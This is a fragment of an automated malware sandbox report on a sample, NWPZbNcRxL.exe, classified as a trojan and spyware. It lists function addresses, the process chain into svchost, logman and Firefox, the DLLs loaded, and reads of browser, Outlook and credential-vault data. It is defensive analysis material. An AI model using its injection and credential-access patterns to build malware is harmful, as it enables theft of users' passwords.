                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD22_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03903FD52_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320A3525_2_0320A352
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032103E65_2_032103E6
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0315E3F05_2_0315E3F0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F02745_2_031F0274
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031D02C05_2_031D02C0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031EA1185_2_031EA118
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031401005_2_03140100
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031D81585_2_031D8158
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032041A25_2_032041A2
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032101AA5_2_032101AA
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032081CC5_2_032081CC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031E20005_2_031E2000
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031747505_2_03174750
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031507705_2_03150770
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0314C7C05_2_0314C7C0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0316C6E05_2_0316C6E0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031505355_2_03150535
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032105915_2_03210591
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F44205_2_031F4420
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032024465_2_03202446
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031FE4F65_2_031FE4F6
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320AB405_2_0320AB40
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03206BD75_2_03206BD7
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0314EA805_2_0314EA80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031669625_2_03166962
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0321A9A65_2_0321A9A6
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031529A05_2_031529A0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031528405_2_03152840
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0315A8405_2_0315A840
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031368B85_2_031368B8
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0317E8F05_2_0317E8F0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03170F305_2_03170F30
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F2F305_2_031F2F30
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03192F285_2_03192F28
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031C4F405_2_031C4F40
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031CEFA05_2_031CEFA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03142FC85_2_03142FC8
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0315CFE05_2_0315CFE0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320EE265_2_0320EE26
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03150E595_2_03150E59
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03162E905_2_03162E90
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320CE935_2_0320CE93
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320EEDB5_2_0320EEDB
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031ECD1F5_2_031ECD1F
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0315AD005_2_0315AD00
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03168DBF5_2_03168DBF
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0314ADE05_2_0314ADE0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03150C005_2_03150C00
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F0CB55_2_031F0CB5
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03140CF25_2_03140CF2
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320132D5_2_0320132D
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0313D34C5_2_0313D34C
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0319739A5_2_0319739A
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031552A05_2_031552A0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0316B2C05_2_0316B2C0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F12ED5_2_031F12ED
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0321B16B5_2_0321B16B
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0313F1725_2_0313F172
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0318516C5_2_0318516C
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0315B1B05_2_0315B1B0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320F0E05_2_0320F0E0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032070E95_2_032070E9
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031FF0CC5_2_031FF0CC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031570C05_2_031570C0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320F7B05_2_0320F7B0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031956305_2_03195630
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032016CC5_2_032016CC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032075715_2_03207571
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031ED5B05_2_031ED5B0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_032195C35_2_032195C3
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320F43F5_2_0320F43F
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031414605_2_03141460
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320FB765_2_0320FB76
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0316FB805_2_0316FB80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0318DBF95_2_0318DBF9
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031C5BF05_2_031C5BF0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03207A465_2_03207A46
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320FA495_2_0320FA49
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031C3A6C5_2_031C3A6C
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031EDAAC5_2_031EDAAC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03195AA05_2_03195AA0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031F1AA35_2_031F1AA3
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031FDAC65_2_031FDAC6
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031E59105_2_031E5910
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031599505_2_03159950
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0316B9505_2_0316B950
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031BD8005_2_031BD800
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031538E05_2_031538E0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320FF095_2_0320FF09
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03151F925_2_03151F92
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320FFB15_2_0320FFB1
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03113FD25_2_03113FD2
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03113FD55_2_03113FD5
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03159EB05_2_03159EB0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03207D735_2_03207D73
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03153D405_2_03153D40
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_03201D5A5_2_03201D5A
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0316FDC05_2_0316FDC0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_031C9C325_2_031C9C32
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0320FCF25_2_0320FCF2
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02741D805_2_02741D80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273CE905_2_0273CE90
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273AE805_2_0273AE80
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273AFD05_2_0273AFD0
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273AFC45_2_0273AFC4
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273CC705_2_0273CC70
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0273CC685_2_0273CC68
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_027436205_2_02743620
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0274361F5_2_0274361F
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_027454205_2_02745420
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_0275BB005_2_0275BB00
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02F6E3385_2_02F6E338
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02F6E7EC5_2_02F6E7EC
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02F6E4535_2_02F6E453
                Source: C:\Windows\SysWOW64\logman.exeCode function: 5_2_02F6D8B85_2_02F6D8B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 111 times
                Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03197E54 appears 111 times
                Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 031CF290 appears 105 times
                Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 031BEA12 appears 86 times
                Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 03185130 appears 58 times
                Source: C:\Windows\SysWOW64\logman.exeCode function: String function: 0313B970 appears 280 times
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: String function: 00C17DE1 appears 36 times
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: String function: 00C30AE3 appears 70 times
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: String function: 00C38900 appears 42 times
                Source: NWPZbNcRxL.exe, 00000000.00000003.2059826106.000000000397D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NWPZbNcRxL.exe
                Source: NWPZbNcRxL.exe, 00000000.00000003.2061070599.00000000037D3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NWPZbNcRxL.exe
                Source: NWPZbNcRxL.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/12
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7A06A GetLastError,FormatMessageW,0_2_00C7A06A
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C681CB AdjustTokenPrivileges,CloseHandle,0_2_00C681CB
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C687E1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C7B3FB
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C8EE0D
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C7C397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C7C397
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C14E89
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeFile created: C:\Users\user\AppData\Local\Temp\autCA7F.tmpJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCommand line argument: (l0_2_00C147D0
                Source: NWPZbNcRxL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: logman.exe, 00000005.00000003.2596274159.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002C0F000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2596138045.0000000002BBF000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4503848678.0000000002BEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NWPZbNcRxL.exeReversingLabs: Detection: 71%
                Source: NWPZbNcRxL.exeVirustotal: Detection: 45%
                Source: unknownProcess created: C:\Users\user\Desktop\NWPZbNcRxL.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"
                Source: C:\Windows\SysWOW64\logman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NWPZbNcRxL.exe"Jump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeProcess created: C:\Windows\SysWOW64\logman.exe "C:\Windows\SysWOW64\logman.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\logman.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\logman.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: NWPZbNcRxL.exeStatic file information: File size 1255936 > 1048576
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: NWPZbNcRxL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: logman.pdb source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WnOFOMnqmLQAP.exe, 00000004.00000002.4503538200.000000000008E000.00000002.00000001.01000000.00000005.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2483941200.000000000008E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: logman.pdbGCTL source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
                Source: NWPZbNcRxL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: NWPZbNcRxL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: NWPZbNcRxL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: NWPZbNcRxL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: NWPZbNcRxL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C14B37 LoadLibraryA,GetProcAddress,0_2_00C14B37
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C306FE push es; ret 0_2_00C3070B
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3070E push es; ret 0_2_00C3070F
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C30710 push es; ret 0_2_00C3071B
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C30720 push es; ret 0_2_00C30723
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C30724 push es; ret 0_2_00C30727
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C3072A push es; ret 0_2_00C30733
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C30734 push es; ret 0_2_00C30737
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C30739 push es; ret 0_2_00C30753
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C38945 push ecx; ret 0_2_00C38958
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C32BDC push ds; ret 0_2_00C32BE2
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C253ED push edx; retn 0000h0_2_00C253EE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D156 push esp; retf 2_2_0040D159
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041197F pushfd ; iretd 2_2_00411989
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403190 push eax; ret 2_2_00403192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181BD push ds; ret 2_2_004181BF
